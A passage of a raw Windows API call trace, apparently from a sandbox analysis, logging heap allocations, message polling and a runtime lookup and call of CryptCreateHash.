wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0261.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0261.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0261.555] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cd0 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0261.555] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0261.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0261.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0261.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0261.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0261.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0261.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0261.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0261.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0261.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0261.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0261.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0261.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0261.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0261.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0261.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0261.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0261.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0261.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0261.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0261.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0261.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0261.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0261.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0261.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51c28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0261.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0261.637] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0261.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0261.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0261.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0261.638] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0261.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0261.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0261.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0261.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0261.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0261.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0261.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0261.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0261.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0261.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0261.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0261.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0261.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0261.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 